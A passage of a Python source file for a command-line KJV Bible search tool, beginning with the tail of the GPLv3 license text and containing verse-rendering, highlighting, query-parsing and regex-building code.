or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Use with the GNU Affero General Public License.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
'''
warranty_str = \
'''
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
'''
""" KJV indexer and search modules.
BibleSearch: Can index and search the 'KJV' sword module using different types
of searches, including the following:
Strongs number search - Searches for all verses containing either
the phrase strongs phrase, any strongs
number or a superset of the strongs
numbers.
Morphological tags search - Same as the strongs...
Word or phrase search - Same as the strongs...
Regular expression search - Searches the whole Bible using the provided
regular expression.
"""
from sys import argv, exit
from cmd import Cmd
from difflib import get_close_matches
from functools import wraps
from time import strftime
from textwrap import fill
from collections import defaultdict
from itertools import product
import os
import sys
import json
import re
from .utils import *
try:
import bla
from .sword_verses import *
except ImportError:
Sword = None
from .verses import *
COLOR_LEVEL = 3
# Highlight colors.
highlight_color = '\033[7m'
highlight_text = '%s\\1\033[m' % highlight_color
word_regx = re.compile(r'\b([\w-]+)\b')
# Strip previous color.
strip_color_regx = re.compile('\033\[[\d;]*m')
def render_raw2(verse_text, strongs=False, morph=False):
""" Render raw verse text.
"""
strong_regx = re.compile(r'strong:([GH]\d+)', re.I)
morph_regx = re.compile(r'(?:Morph|robinson):([\w-]*)', re.I)
test_regx = re.compile(r'''
([^<]*)
<(?P<tag>seg|q|w|transChange|note)([^>]*)>
([\w\W]*?)
</(?P=tag)>
([^<]*)
''', re.I | re.X)
divname_regx = re.compile(r'''
<(?:divineName)>
([^<]*?)
([\'s]*)
</(?:divineName)>
''', re.I | re.X)
div_upper = lambda m: m.group(1).upper() + m.group(2)
marker_regx = re.compile(r'.*marker="(.)".*', re.I)
info_print(verse_text, tag=4)
def recurse_tag(text):
""" Recursively parse raw verse text using regular expressions, and
returns the correctly formatted text.
"""
v_text = ''
for match in test_regx.finditer(text):
opt, tag_name, tag_attr, tag_text, punct = match.groups()
strongs_str = ''
morph_str = ''
italic_str = '<i>%s</i>' if 'added' in tag_attr.lower() else '%s'
if 'note' in tag_name.lower() or 'study' in tag_attr.lower():
note_str = ' <n>%s</n>'
else:
note_str = '%s'
if strongs and strong_regx.search(tag_attr):
strongs_list = strong_regx.findall(tag_attr)
strongs_str = ' <%s>' % '> <'.join(strongs_list)
if morph and morph_regx.search(tag_attr):
morph_list = morph_regx.findall(tag_attr)
morph_str = ' {%s}' % '} {'.join(morph_list)
if match.re.search(tag_text):
temp_text = recurse_tag(tag_text) + strongs_str + morph_str
v_text += note_str % italic_str % (temp_text)
else:
info_print((opt, tag_name, tag_attr, tag_text, punct), tag=4)
opt = marker_regx.sub('<p>\\1</p> ', opt)
tag_text = divname_regx.sub(div_upper, tag_text)
tag_text = note_str % italic_str % tag_text
v_text += opt + tag_text + strongs_str + morph_str
v_text += punct
return v_text
return recurse_tag(verse_text)
def render_raw(verse_text, strongs=False, morph=False):
""" Render raw verse text.
"""
strong_regx = re.compile(r'strong:([GH]\d+)', re.I)
morph_regx = re.compile(r'(?:Morph|robinson):([\w-]*)', re.I)
test_regx = re.compile(r'''
([^<]*)
<(?P<tag>q|w|transChange|note)([^>]*)>
([\w\W]*?)
</(?P=tag)>
([^<]*)
''', re.I | re.X)
divname_regx = re.compile(r'''
(?:<seg>)?
<(?:divineName)>+
([^<]*?)
([\'s]*)
</(?:divineName)>
(?:</seg>)?
''', re.I | re.X)
xadded_regx = re.compile(r'<seg subType="x-added"[^>]*>([^<]*)</seg>',
re.I)
div_upper = lambda m: m.group(1).upper() + m.group(2)
marker_regx = re.compile(r'.*marker="(.)".*', re.I)
v_text = ''
info_print(verse_text, tag=4)
for match in test_regx.finditer(verse_text):
opt, tag_name, tag_attr, tag_text, punct = match.groups()
italic_str = '%s'
if match.re.search(tag_text):
if 'added' in tag_attr.lower():
italic_str = '<i>%s</i>' + punct
punct = ''
match_list = match.re.findall(tag_text + punct)
else:
match_list = [match.groups()]
temp_text = ''
for opt, tag_name, tag_attr, tag_text, punct in match_list:
info_print((opt, tag_name, tag_attr, tag_text, punct), tag=4)
tag_text = divname_regx.sub(div_upper, tag_text)
tag_text = xadded_regx.sub('<i>\\1</i>', tag_text)
if 'marker' in opt.lower():
temp_text += '<p>%s</p> ' % marker_regx.sub('\\1', opt)
opt = ''
if 'note' in tag_name.lower() or 'study' in tag_attr.lower():
temp_text += ' <n>%s</n>' % tag_text
tag_text = ''
temp_italic = '<i>%s</i>' if 'added' in tag_attr.lower() else '%s'
temp_text += temp_italic % (opt + tag_text)
if tag_name.strip().lower() in ['transchange', 'w', 'seg']:
if strong_regx.search(tag_attr) and strongs:
temp_text += \
' <%s>' % '> <'.join(strong_regx.findall(tag_attr))
if morph_regx.search(tag_attr) and morph:
temp_text += \
' {%s}' % '} {'.join(morph_regx.findall(tag_attr))
temp_text += punct
v_text += italic_str % temp_text
continue
opt, tag_name, tag_attr, tag_text, punct = match.groups()
tag_text = divname_regx.sub(
lambda m: m.group(1).upper() + m.group(2), tag_text)
if 'marker' in opt.lower():
v_text += '<p>%s</p> ' % marker_regx.sub('\\1', opt)
if 'added' in tag_attr.lower():
v_text += '<i>'
elif 'note' in tag_name.lower() or 'study' in tag_attr.lower():
v_text += ' <n>%s</n>' % tag_text
if match.re.search(tag_text):
for i in match.re.finditer(tag_text):
info_print(i.groups(), tag=4)
o, t_n, t_a, t_t, p = i.groups()
if t_n.strip().lower() in ['transchange', 'w']:
v_text += o + t_t
if strong_regx.search(t_a) and strongs:
v_text += \
' <%s>' % '> <'.join(strong_regx.findall(t_a))
if morph_regx.search(t_a) and morph:
v_text += \
' {%s}' % '} {'.join(morph_regx.findall(t_a))
v_text += p
else:
if tag_name.strip().lower() in ['transchange', 'w']:
v_text += tag_text
if strong_regx.search(tag_attr) and strongs:
v_text += \
' <%s>' % '> <'.join(strong_regx.findall(tag_attr))
if morph_regx.search(tag_attr) and morph:
v_text += \
' {%s}' % '} {'.join(morph_regx.findall(tag_attr))
if 'added' in tag_attr.lower():
v_text += '</i>'
v_text += punct
info_print('%s: %s: %s: %s: %s' % (opt, tag_name, tag_attr,
tag_text, punct), tag=4)
return v_text
def render_verses_with_italics(ref_list, wrap=True, strongs=False,
morph=False, added=True, notes=False,
highlight_func=None, module='KJV', *args):
""" Renders a the verse text at verse_ref with italics highlighted.
Returns a strong "verse_ref: verse_text"
ref_list - List of references to render
wrap - Whether to wrap the text.
strongs - Include Strong's Numbers in the output.
morph - Include Morphological Tags in the output.
added - Include added text (i.e. italics) in the output.
notes - Include study notes at the end of the text.
highlight_func - A function to highlight anything else
(i.e. search terms.)
module - Sword module to render from.
*args - Any additional arguments to pass to
hightlight_func
highlight_func should take at least three arguments, verse_text,
strongs, and morph.
"""
# Set the colors of different items.
end_color = '\033[m'
# Build replacement strings that highlight Strong's Numbers and
# Morphological Tags.
if COLOR_LEVEL >= 2:
# The Strong's and Morphology matching regular expressions.
# Match strongs numbers.
strongs_regx = re.compile(r'''
<((?:\033\[[\d;]*m)*?[GH]?\d+?(?:\033\[[\d;]*m)*?)>
''', re.I | re.X)
# It needs to match with braces or it will catch all capitalized
# word and words with '-'s in them.
info_print("Rendering results, please wait...\n", tag=0)
morph_regx = re.compile(r'''
\{((?:\033\[[\d+;]*m)*?[\w-]*?(?:\033\[[\d+;]*m)*?)\}
''', re.X)
strongs_color = '\033[36m'
morph_color = '\033[35m'
strongs_highlight = '<%s\\1%s>' % (strongs_color, end_color)
morph_highlight = '{%s\\1%s}' % (morph_color, end_color)
if COLOR_LEVEL >= 0:
ref_color = '\033[32m'
ref_highlight = '%s\\1%s' % (ref_color, end_color)
if COLOR_LEVEL >= 1 and added:
italic_color = '\033[4m'
italic_regx = re.compile(r'<i>\s?(.*?)\s?</i>', re.S)
italic_highlight = '%s\\1%s' % (italic_color, end_color)
# Get the local text encoding.
encoding = get_encoding()
# A substitution replacement function for highlighting italics.
def italic_color(match):
""" Color italic text, but first remove any previous color.
"""
# Strip any previous colors.
match_text = strip_color_regx.sub('', match.groups()[0])
# Color the italics.
return word_regx.sub(italic_highlight, match_text)
# Get an iterator over all the requested verses.
verse_iter = IndexedVerseTextIter(iter(ref_list), strongs, morph,
italic_markers=(COLOR_LEVEL >= 1),
added=added, paragraph=added,
notes=notes, module=module)
if VERBOSE_LEVEL == 20:
verse_iter = VerseTextIter(iter(ref_list), strongs, morph,
module=module, markup=1, #Sword.FMT_PLAIN,
render='render_raw')
if VERBOSE_LEVEL >= 30:
verse_iter = RawDict(iter(ref_list), module=module)
for verse_ref, verse_text in verse_iter:
if VERBOSE_LEVEL >= 30:
len_longest_key = len(max(verse_text[1].keys(), key=len))
for key, value in verse_text[1].items():
print('\033[33m{0:{1}}\033[m: {2}'.format(key,
len_longest_key,
value))
verse_text = verse_text[1]['_verse_text'][0]
# Encode than decode the verse text to make it compatable with
# the locale.
verse_text = verse_text.strip().encode(encoding, 'replace')
verse_text = verse_text.decode(encoding, 'replace')
verse_text = '%s: %s' % (verse_ref, verse_text)
# The text has to be word wrapped before adding any color, or else the
# color will add to the line length and the line will wrap too soon.
if wrap:
verse_text = fill(verse_text, screen_size()[1],
break_on_hyphens=False)
if COLOR_LEVEL >= 0:
# Color the verse reference.
colored_ref = word_regx.sub(ref_highlight, verse_ref)
verse_text = re.sub(verse_ref, colored_ref, verse_text)
if COLOR_LEVEL >= 1 and added:
# Highlight the italic text we previously pulled out.
verse_text = italic_regx.sub(italic_color, verse_text)
if COLOR_LEVEL >= 2:
# Highlight Strong's and Morphology if they are visible.
if strongs:
verse_text = strongs_regx.sub(strongs_highlight, verse_text)
if morph:
verse_text = morph_regx.sub(morph_highlight, verse_text)
if COLOR_LEVEL >= 3:
# Highlight the different elements.
if highlight_func:
verse_text = highlight_func(verse_text, *args)
# Finally produce the formated text.
yield verse_text
def highlight_search_terms(verse_text, regx_list, highlight_text,
color_tag='\033\[[\d+;]*m', *args):
""" Highlight search terms in the verse text.
"""
def highlight_group(match):
""" Highlight each word/Strong's Number/Morphological Tag in the
match.
"""
match_text = match.group()
for word in set(match.groups()):
if word: # and word != match_text:
# if word.lower() == 'strong' and word == match_text:
# continue
info_print(word, tag=20)
try:
match_text = re.sub('''
(
(?:{0}|\\b)+
{1}
(?:{0}|\\b)+
)
'''.format(color_tag, re.escape(word)),
highlight_text, match_text, flags=re.X)
except Exception as err:
info_print("Error with highlighting word %s: %s" % \
(word, err), tag=4)
#match_text = match_text.replace(word, '\033[7m%s\033[m' % word)
# print(match_text)
return match_text
# Strip any previous colors.
# match_text = strip_color_regx.sub('', match.group())
# return word_regx.sub(highlight_text, match_text)
verse_text = verse_text.strip()
# Apply each highlighting regular expression to the text.
for regx in regx_list:
verse_text = regx.sub(highlight_group, verse_text)
return verse_text
def build_highlight_regx(search_list, case_sensitive, sloppy=False,
color_tag='\033\[[\\\\d+;]*m', extra_tag='\033'):
""" Build a regular expression and highlight string to colorize the
items in search_list as they appear in a verse.
"""
if not search_list:
return []
regx_list = []
# Extra word boundry to catch ansi color escape sequences.
escaped_word_bound = '(?:{0}|\\\\b)+'.format(color_tag)
word_bound = '(?:{0}|\\b)+'.format(color_tag)
# Extra space filler to pass over ansi color escape sequences.
extra_space = '|{0}|{1}'.format(color_tag, extra_tag)
# print(word_bound, extra_space, '(?:\033\[[\d+;]*m|\\b)+')
for item in search_list:
item = item.strip()
is_regex = (('*' in item and ' ' not in item) or item.startswith('&'))
if ('*' in item and ' ' not in item) and not item.startswith('&'):
# Build a little regular expression to highlight partial words.
item = item[1:] if item[0] in '!^+|' else item
item = item.replace('*', '\w*')
item = r'{0}({1}){0}'.format(word_bound, item)
if item.startswith('&'):
# Just use a regular expression. ('&' marks the term as a regular
# expression.)
item = item[1:]
regx_list.append(Search.search_terms_to_regex(item, case_sensitive,
word_bound=escaped_word_bound, extra_space=extra_space,
sloppy=(sloppy or '~' in item), is_regex=is_regex))
return regx_list
def mod_lookup(mod, items):
""" Looks up items in a module and returns the formated text.
"""
item_lookup = Lookup(mod)
# Seperate all elements by a comma.
item_list = ','.join(items.split()).split(',')
text_list = []
for item in item_list:
item_text = item_lookup.get_formatted_text(item)
text_list.append('\033[1m%s\033[m:\n%s' % (item, item_text))
return '\n\n'.join(text_list)
class StdoutRedirect(object):
""" Redirect stdout to a specified output function.
"""
def __init__(self, output_func, *args):
""" Set the output function and get the extra arguments to pass to it.
"""
self._output_func = output_func
self._args = args
self._old_stdout = sys.stdout
def write(self, data):
""" Write data to the output function.
"""
if data.strip():
self._output_func(data, *self._args)
def __enter__(self):
""" Change sys.stdout to this class.
"""
try:
sys.stdout = self
return self
except Exception as err:
print("Error in __enter__: %s" % err, file=sys.stderr)
return None
def __exit__(self, exc_type, exc_value, traceback):
""" Change sys.stdout back to its old value.
"""
try:
sys.stdout = self._old_stdout
if exc_type:
return False
return True
except Exception as err:
print("Error in __exit__: %s" % err, file=sys.stderr)
return False
class IndexedVerseTextIter(object):
""" An iterable object for accessing verses in the Bible. Maybe it will
be easier maybe not.
"""
def __init__(self, reference_iter, strongs=False, morph=False,
module='KJV', italic_markers=False, added=True,
paragraph=True, notes=False, path=''):
""" Initialize.
"""
reg_list = []
if not strongs:
reg_list.append(r'\s*<([GH]\d+)>')
if not morph:
reg_list.append(r'\s*\{([\w-]+)\}')
if not added:
reg_list.append(r'\s?<i>\s?(.*?)\s?</i>')
if not italic_markers:
reg_list.append(r'(<i>\s?|\s?</i>)')
if not paragraph:
reg_list.append(r'\s?<p>\s?(.*?)\s?</p>')
else:
reg_list.append(r'(<p>\s?|\s?</p>)')
reg_str = r'(?:%s)' % r'|'.join(reg_list)
self._clean_regex = re.compile(reg_str, re.S)
self._notes_regex = re.compile(r'\s?<n>\s?(.*?)\s?</n>', re.S)
self._notes_str = ' (Notes: \\1)' if notes else ''
self._index_dict = IndexDict('%s' % module, path)
self._ref_iter = reference_iter
def next(self):
""" Returns the next verse reference and text.
"""
return self.__next__()
def __next__(self):
""" Returns a tuple of the next verse reference and text.
"""
# Retrieve the next reference.
verse_ref = next(self._ref_iter)
# Set the verse and render the text.
verse_text = self._get_text(verse_ref)
return (verse_ref, verse_text.strip())
def __iter__(self):
""" Returns an iterator of self.
"""
return self
def _get_text(self, verse_ref):
""" Returns the verse text. Override this to produce formatted verse
text.
"""
verse_text = self._index_dict[verse_ref]
verse_text = self._clean_regex.sub('', verse_text)
verse_text = self._notes_regex.sub(self._notes_str, verse_text)
return verse_text
class CombinedParse(object):
""" A parser for simple combined search parsing.
((in OR tree) AND the) AND (house OR bush) =>
['in the house', 'in the bush', 'tree the house', 'tree the bush']
Also it has a NOT word list.
created NOT (and OR but) => ['created'] ['and', 'but']
"""
def __init__(self, arg_str):
""" Initialize the parser and parse the arg string.
"""
self._arg_str = arg_str
self._arg_list = arg_str.split()
parsed_list = self.parse_string(list(arg_str))
self._word_list, self._not_list = self.parse_list(parsed_list)
# Make the results accesable via read-only properties.
word_list = property(lambda self: self._word_list)
not_list = property(lambda self: self._not_list)
def parse_list(self, arg_list):
""" Parse a list such as ['created', 'NOT', ['and', 'OR', 'but']] into
search_args = ['created'] not_list = ['and', 'but']
"""
# The list we're working on building.
working_list = []
# The list of words not to include.
not_list = []
for i in arg_list:
# Skip 'OR's
if i == 'OR':
continue
if isinstance(i, list):
# A list was found so parse it and get the results.
temp_list, temp_not_list = self.parse_list(i)
# Add the returned not list to the current not list.
not_list.extend(temp_not_list)
if working_list:
if working_list[-1] == 'AND':
# Pop the 'AND' off the end of the list.
working_list.pop()
# Combine each element of the working listh with each
# element of the returned list replace the working
# list with those combinations.
# (i.e. working_list = ['this', 'that']
# temp_list = ['tree', 'house']
# result = ['this tree', 'this house',
# 'that tree', 'that house']
working_list = ['%s %s' % j \
for j in product(working_list, temp_list)]
elif working_list[-1] == 'NOT':
# Take the 'NOT' off to show we've processed it.
working_list.pop()
# Add the returned list to the NOT list.
not_list.extend(temp_list)
else:
# Just extend the working list with the retuned list.
working_list.extend(temp_list)
else:
# Just extend the working list with the retuned list.
working_list.extend(temp_list)
else:
if i == 'AND':
# Put the 'AND' on the list for later processing.
working_list.append(i)
elif working_list:
if working_list[-1] == 'AND':
# Take the 'AND' off the list.
working_list.pop()
# Combine all the elements of working_list with i, and
# replace working list with the resulting list.
# (i.e. working_list = ['he', 'it'] i = 'said'
# result = ['he said', 'it said']
working_list = ['%s %s' % (j, i) for j in working_list]
elif working_list[-1] == 'NOT':
# Remove the 'NOT'.
working_list.pop()
# Add the word to the not list.
not_list.append(i)
else:
# Add the word to the working list.
working_list.append(i)
else:
# Add the word to the working list.
working_list.append(i)
# Split and then combine all the strings in working_list.
# Basically removes runs of whitespace.
working_list = [' '.join(i.split()) for i in working_list]
# Return the final list and not list.
return working_list, not_list
def parse_parenthesis(self, arg_list):
""" Recursively processes strings in parenthesis converting them
to nested lists of strings.
"""
# The return list.
return_list = []
# Temorary string.
temp_str = ''
while arg_list:
# Get the next character.
c = arg_list.pop(0)
if c == '(':
# An opening parenthesis was found so split the current string
# at the spaces putting them in the return list, and clean
# the string.
if temp_str:
return_list.extend(temp_str.split())
temp_str = ''
# Process from here to the closing parenthesis.
return_list.append(self.parse_parenthesis(arg_list))
elif c == ')':
# The parenthesis is closed so return back to the calling
# function.
break
else:
# Append the current not parenthesis character to the string.
temp_str += c
if temp_str:
# Split and add the string to the return list.
return_list.extend(temp_str.split())
# Return what we found.
return return_list
def parse_string(self, arg_list):
""" Parse a combined search arg string. Convert a string such as:
'created NOT (and OR but)' => ['created', 'NOT', ['and', 'OR', 'but']]
"""
# This does the same thing only using json.
#
# Regular expression to group all words.
#word_regx = re.compile(r'\b(\w*)\b')
# Put quotes around all words and opening replace paranthesis with
# brackets, put all of that in brackets.
#temp_str = '[%s]' % word_regx.sub('"\\1"', arg_str).replace('(', '[')
# Replace closing parenthesis with brackets and replace a '" ' with
# '", '.
#temp_str = temp_str.replace(')', ']').replace('" ', '",')
# finally replace '] ' with '], '. The end result should be a valid
# json string that can be converted to a list.
#temp_str = temp_str.replace('] ', '],')
# Convert the string to a list.
#return_list = json.loads(temp_str)
#return return_list
# The return list.
return_list = []
# Temporary string.
temp_str = ''
while arg_list:
# Pop the next character.
c = arg_list.pop(0)
if c == '(':
# A parenthesis was found store and reset the string.
# And parse the what is in the parenthesis.
if temp_str:
return_list.extend(temp_str.split())
temp_str = ''
return_list.append(self.parse_parenthesis(arg_list))
else:
# Append the non parenthesis character to the string.
temp_str += c
if temp_str:
# Store the final string in the list.
return_list.extend(temp_str.split())
#info_print(return_list)
# Return the list.
return return_list
class Search(object):
""" Provides a simple way of searching an IndexDict for verses.
"""
# To check for spaces.
_whitespace_regx = re.compile(r'\s')
# Cleanup regular expressions.
_non_alnum_regx = re.compile(r'[^\w\*<>\{\}\(\)-]')
_fix_regx = re.compile(r'\s+')
# Match strongs numbers.
_strongs_regx = re.compile(r'[<]?(\b[GH]\d+\b)[>]?', re.I)
# It needs to match with braces or it will catch all capitalized
# word and words with '-'s in them.
_morph_regx = re.compile(r'[\(\{](\b[\w-]+\b)[\}\)]', re.I)
_word_regx = re.compile(r'\b([\w\\-]+)\b')
_space_regx = re.compile(r'\s+')
_non_word_regx = re.compile(r'[<>\(\)]')
_fix_strongs = classmethod(lambda c, m: '<%s>' % m.groups()[0].upper())
_fix_morph = classmethod(lambda c, m: '{%s}' % m.groups()[0].upper())
# Escape the morphological tags.
_escape_morph = classmethod(lambda c, m: \
'\{%s\}' % re.escape(m.groups()[0]).upper())
def __init__(self, module='KJV', path='', multiword=False):
""" Initialize the search.
"""
# The index dictionary.
self._index_dict = IndexDict(module, path)
self._module_name = module
self._multi = multiword
@classmethod
def search_terms_to_regex(cls, search_terms, case_sensitive,
word_bound='\\\\b', extra_space='',
sloppy=False, is_regex=False):
""" Build a regular expression from the search_terms to match a verse
in the Bible.
"""
# Set the flags for the regular expression.
flags = re.I if not case_sensitive else 0
if is_regex:
reg_str = search_terms
info_print('\nUsing regular expression: %s\n' % reg_str, tag=2)
try:
return re.compile(reg_str, flags)
except Exception as err:
print("An error occured while compiling the highlight "
"regular expression %s: %s." % (reg_str, err),
" There will be no highlighting.\n", file=sys.stderr)
return re.compile(r'')
# This will skip words.
not_words_str = r'\b\w+\b'
# This will skip Strong's Numbers.
not_strongs_str = r'<[^>]*>'
# This wil skip Morphological Tags.
not_morph_str = r'\{[^\}]*\}'
# This will skip all punctuation. Skipping ()'s is a problem for
# searching Morphological Tags, but it is necessary for the
# parenthesized words. May break highlighting.
not_punct_str = r'[\s,\?\!\.;:\\/_\(\)\[\]"\'-]'
# This will skip ansi color.
not_color_str = r'\033\[[\d;]*m'
# Match all *'s
star_regx = re.compile(r'\*')
# Hold the string that fills space between search terms.
space_str = ''
# Get stars past so we can replace them with '\w*' later.
temp_str, word_count = star_regx.subn(r'_star_', search_terms)
# Hack to get rid of unwanted characters.
temp_str = cls._non_alnum_regx.sub(' ', temp_str).split()
temp_str = ' '.join(temp_str)
# Phrases will have spaces in them
phrase = bool(cls._whitespace_regx.search(temp_str))
# Escape the morphological tags, and also find how many there are.
temp_str, morph_count = cls._morph_regx.subn(cls._escape_morph,
temp_str)
# Make all Strong's Numbers uppercase, also find how many there are.
temp_str, strongs_count = cls._strongs_regx.subn(cls._fix_strongs,
temp_str)
# Select all words.
#repl = '(\\\\b\\1\\\\b)'
# This works:
# temp_str, word_count = \
# cls._word_regx.subn('{0}(\\1){0}'.format(word_bound), temp_str)
repl = '(?:{0}(\\1){0})'.format(word_bound)
temp_str, word_count = cls._word_regx.subn(repl, temp_str)
# Replace what used to be *'s with '\w*'.
temp_str = temp_str.replace('_star_', '\w*')
# All the Strong's and Morphology were changed in the previous
# substitution, so if that number is greater than the number of
# Strong's plus Morphology then there were words in the search terms.
# I do this because I don't know how to only find words.
words_found = (strongs_count + morph_count) < word_count
if phrase:
# Build the string that is inserted between the items in the
# search string.
space_str = r'(?:%s%s' % (not_punct_str, extra_space)
if not bool(strongs_count) or sloppy:
# Skip over all Strong's Numbers.
space_str = r'%s|%s' % (space_str, not_strongs_str)
if not bool(morph_count) or sloppy:
# Skip all Morphological Tags.
space_str = r'%s|%s' % (space_str, not_morph_str)
if not words_found or bool(morph_count) or bool(strongs_count) or \
sloppy:
# Skip words. If word attributes are in the search we can
# skip over words and still keep it a phrase.
space_str = r'%s|%s' % (space_str, not_words_str)
# Finally make it not greedy.
space_str = r'%s)*?' % space_str
else:
space_str = ''
# Re-combine the search terms with the regular expression string
# between each element.
reg_str = space_str.join(temp_str.split())
info_print('\nUsing regular expression: %s\n' % reg_str, tag=2)
try:
return re.compile(reg_str, flags)
except Exception as err:
print("An error occured while compiling the highlight "
"regular expression %s: %s." % (reg_str, err),
" There will be no highlighting.\n", file=sys.stderr)
return re.compile(r'')
def _sorted_iter(self, verse_ref_set):
""" Returns an iterator over a sorted version of verse_ref_set.
"""
# Speed up the iteration by first sorting the range.
return iter(sorted(verse_ref_set, key=sort_key))
def _clean_text(self, text):
""" Return a clean (only alphanumeric) text of the provided string.
"""
# Do we have to use two regular expressions to do this.
# Replace all non-alphanumeric characters with a space.
temp_text = self._non_alnum_regx.sub(' ', text)
# Replace one or more spaces with one space.
clean_text = self._fix_regx.sub(' ', temp_text)
return clean_text.strip()
def _fix_strongs_morph(self, search_terms):
""" Make any Strong's or Morphology uppercase, put parenthesis around
the Morphological Tags, and put <>'s around the Strong's Numbers.
"""
# Capitalize all strongs numbers and remove the <> from them.
temp_str = self._strongs_regx.sub(self._fix_strongs, search_terms)
# Capitalize all morphological tags and make sure they are in
# parenthesis.
temp_str = self._morph_regx.sub(self._fix_morph, temp_str)
return temp_str
def _process_search(func):
""" Returns a wrapper function that processes the search terms, calls
the wrapped function, and, if applicable, confines the resulting verse
set to a range.
"""
@wraps(func)
def wrapper(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" Process the search terms according to the wrapped functions
requirements, then apply the range, if given, to the returned set
of verses.
"""
if func.__name__ in ['sword_search']:
if not Sword:
print("Sword library not found.")
return
if not isinstance(search_terms, str):
# Combine the terms for use by the different methods.
search_terms = ' '.join(search_terms)
# Get a valid set of verse references that conform to the passed
# range.
range_set = parse_verse_range(range_str)
if func.__name__ not in ['regex_search', 'partial_word_search']:
# Try to catch and fix any Strong's Numbers or Morphological
# Tags.
search_terms = self._fix_strongs_morph(search_terms)
# Regular expression and combined searches get the search terms as
# they were passed.
if func.__name__ in ['multiword_search', 'anyword_search',
'phrase_search', 'mixed_phrase_search']:
# Get rid of any non-alphanumeric or '-' characters from
# the search string.
search_str = self._clean_text(search_terms).strip()
if strongs or morph:
# Strong's numbers and Morphological tags are all
# uppercase. This is only required if the Morphological
# Tags were not surrounded by parenthesis.
search_str = search_str.upper().strip()
else:
search_str = search_terms
# Get the set of found verses.
found_set = func(self, search_str, strongs, morph, added,
case_sensitive, range_set)
# The phrase, regular expression, and combined searches apply the
# range before searching, so only multi-word and any-word searches
# have it applied here.
if func.__name__ in ['multiword_search', 'anyword_search',
'partial_word_search']:
if range_set:
found_set.intersection_update(range_set)
return found_set
# Return wrapper function.
return wrapper
@_process_search
def combined_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" combined_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str=''): ->
Perform a combined search. Search terms could be
'created NOT (and OR but)' and it would find all verses with the word
'created' in them and remove any verse that had either 'and' or 'but.'
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for '%s'..." % search_terms, tag=1)
# Process the search_terms.
arg_parser = CombinedParse(search_terms)
# Get the list of words and/or phrases to include.
word_list = arg_parser.word_list
# Get the list of words and/or phrases to NOT include.
not_list = arg_parser.not_list
phrase_search = self.phrase_search
multiword_search = self.multiword_search
def combine_proc(str_list):
""" Performs combined search on the strings in str_list, and
returns a set of references that match.
"""
and_it = False
temp_set = set()
for word in str_list:
# A '+' before or after a word means it should have a phrase
# search done on it and the words with it.
if '+' in word:
# Do a phrase search on the word string.
result_set = phrase_search(word.replace('+', ' '), strongs,
morph, case_sensitive,
range_str)
elif word == '&':
# Combine the next search results with this one.
and_it = True
continue
else:
# Do a multi-word search on the word string.
result_set = multiword_search(word, strongs, morph,
case_sensitive, range_str)
if and_it:
# The previous word said to find verses that match both.
temp_set.intersection_update(result_set)
and_it = False
else:
# Only keep the verses that have either one group or the
# other but not both.
